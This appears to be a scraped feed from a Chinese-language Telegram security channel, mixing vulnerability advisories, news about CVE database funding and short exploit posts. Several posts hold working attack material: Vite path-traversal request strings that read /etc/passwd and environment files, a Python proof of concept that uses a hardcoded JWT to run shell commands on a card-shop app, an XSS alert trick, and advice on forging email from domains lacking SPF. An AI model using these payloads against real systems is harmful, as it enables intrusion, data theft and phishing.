踹哈公寓
4.11K subscribers
589 photos
19 videos
307 files
356 links
一等情事

https://t.me/Oracle_talk
Download Telegram
Forwarded from LoopDNS资讯播报
漏洞:Foxmail邮件客户端存在跨站脚本攻击漏洞

漏洞编号:CNTA-2025-0007
重要等级:中等
影响范围:< 7.2.25 [Windows]
漏洞类型:跨站脚本

漏洞概述:该漏洞由于 Foxmail 在加载邮件正文中的 HTML 内容时,对危险内容的过滤处理逻辑存在缺陷。攻击者可利用该漏洞构造包含恶意指令代码的电子邮件,受害者在使用Foxmail打开浏览电子邮件时,无需额外点击,恶意指令代码即被用户主机加载并执行。

风险描述:
1. 攻击者以用户身份即可获取权限。
2. 攻击者无需以用户进行额外点击操作,受害者只需使用 Foxmail 打开或预览带有恶意脚本的邮件,恶意代码即可在后台加载并执行。
3. 受害者设备上,无论是否点击链接、加载图像或执行附件文件,只要客户端自动处理或显示邮件内容,即可能被利用

处置建议: Foxmail 官方已发布修复版本,建议用户务必及时更新至最新版本。如无法立刻升级,可先暂停使用受影响的 Foxmail 客户端版本,或临时改用网页版或其他平台的安全邮件客户端,以确保邮件收发的安全性和稳定性。

补充:该漏洞利用方式简单且具备规模化利用的条件,目前已存在关于该漏洞的在野利用行为

参考信息:国家计算机网络应急技术处理协调中心
🌚2👍1
Forwarded from Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init
/@fs/C://windows/win.ini?import&?inline=1.wasm?init
Puddin在TG上看到了啥
vite还在发力 CVE-2025-31125(CVE-2025-30208的Bypass)
vite还在在发力

/@fs/etc/passwd?.svg?.wasm?init


CVE-2025-31486
Puddin在TG上看到了啥
vite还在在发力 /@fs/etc/passwd?.svg?.wasm?init CVE-2025-31486
vite还在在在发力

/@fs/app#/../proc/self/environ


CVE-2025-32395

需要猜vite项目所在地址,可以从403的返回界面看到(
😁10
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
url + "/api/v4/update_pays",
headers={"Authorization": "Bearer " + jwt_token},
json={
"data": {
# "config": f"[exec({payload!r}), f()][-1]",
"config": f"__import__('os').popen({cmd!r}).read()",
"icon": "\u652f\u4ed8\u5b9d",
"id": 2,
"info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
"isactive": False,
"name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
}
},
)
resp = requests.get(
url + "/api/v4/get_pays",
headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())



https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
😁41
Forwarded from 科技圈🎗在花频道📮
美国CVE漏洞数据库面临资金枯竭危机

美国非营利组织 MITRE 负责维护的全球网络安全关键漏洞数据库——“常见漏洞与披露”(CVE),由政府提供的资金将于本周三到期,或将面临停摆。

CVE漏洞数据库是全球网络安全生态系统的重要基石,为各组织提供漏洞编号、严重程度分级及详细描述。安全专家担忧,一旦CVE漏洞数据库停摆,将严重冲击全球漏洞管理与应变机制,对企业和 CERT(电脑紧急应变小组)等都将产生“快速且严重”的连锁反应。

路透社

📮投稿 ☘️频道 🌸聊天
😨1
声明:此人是骗子,请大家不要上当!
👍5
Forwarded from Pseudorandom Thoughts
https://www.kandji.io/blog/pasivrobber

TLDR:恁美国OSINT又对着China哈气了,路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多

Meiya:什么叫我竟然收集信息了,我不收集信息我干嘛
:你们美国OSINT就不能至少要求一下,做中国威胁情报一定要懂汉语
:错了 做中国情报一定要不懂汉语(
不然就不好意思喊了
今日XSS小技巧之魅力javascript语法

''.replace.call`1${/.../}${alert}`

来源,所以这东西到底是怎么生效的,待我研究一下(
2
这个东西是JS的标签模板语法,本来是用来标记一个模板

f`aaa${arg}bbb`就相当于f(["aaa","bbb"], arg)

所以''.replace.call`1${/.../}${alert}`就相当于''.replace.call(["1","",""], /.../, alert) ,也就是把第一个参数转成字符串"1,,",用正则/.../匹配这个字符串,然后传给alert
👍1
所以说DNS配置不正确就可以伪造这个域名的邮件...

DNS中MX记录标记这个域名可以发送邮件,SPF记录标记哪些服务器可以用这个域名发送邮件

所以如果一个域名(比如说aaa.com)没有配置SPF,那任意服务器都可以用admin@aaa.com之类的邮箱给别人发邮件...

最后伪造邮件可以用emkei.cz这个网站

https://mp.weixin.qq.com/s/UFUBRg3BL1EMy0urkb6xxA
👍2🥰1
Forwarded from 新浪维基 (₴łⱠVɆⱤ₩ØⱠ₣)
This media is not supported in your browser
VIEW IN TELEGRAM
Clash-Verge-Rev 公网 RCE

https://github.com/bron1e/Clash-Verge-Rev-RCE

使用DNS重绑定+`0.0.0.0`day提升我们的CSRF,从而绕过SOP和PNA限制,这真的很酷~
1👍1
Forwarded from 蓝点网订阅频道 (山外的鸭子哥)
#系统资讯 由于开发商失误现在所有 Kali Linux 用户必须手动更新 repo 密钥,否则未来几天 Kali Linux 将无法正常安装任何更新。

出现这种情况是因为 Kali Linux 开发者不慎丢失存储库密钥,如果用户不手动更新最新创建的密钥,则安装更新时会因为无法验证签名而失败。

查看全文:https://ourl.co/108901

→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
→CN2GIA服务器仅99元/年
Forwarded from 渊龙Sec安全团队
【情报】SAP NetWeaver存在RCE漏洞🚨🚨🚨
SAP NetWeaver Visual Compose的指定路径下可以未授权利用该漏洞上传恶意文件,导致服务器失陷,漏洞编号为CVE-2025-31324🥲
资产分布中国和美国使用量都比较大,目前漏洞细节已经公开,存在大范围在野利用🧐
🤣11🤡3